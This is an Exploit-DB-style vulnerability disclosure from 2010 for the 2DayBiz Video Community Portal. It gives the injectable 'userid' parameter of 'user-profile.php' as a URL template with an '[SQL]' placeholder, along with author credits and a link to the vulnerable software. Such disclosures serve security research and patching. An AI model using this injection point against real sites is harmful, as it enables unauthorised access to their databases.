2DayBiz Video Community Portal - 'user-profile.php' SQL Injection

EDB-ID:

14018




Platform:

PHP

Date:

2010-06-24


$-------------------------------------------------------------------------------------------------------------------
$ 2daybiz Video Community portal"user-profile.php" SQL injection
$ Author : Sangteamtham
$ Home : Hcegroup.net
$ Download :http://www.2daybiz.com/videocommunity_portalscript.html
$ Date :06/24/2010
$
$******************************************************************************************
$Exploit:
$
$ http://server/user-profile.php?userid=[id number][SQL]
$
$******************************************************************************************
$ Greetz to: All Vietnamese hackers and Hackers out there researching for
more security
$
$
$--------------------------------------------------------------------------------------------------------------------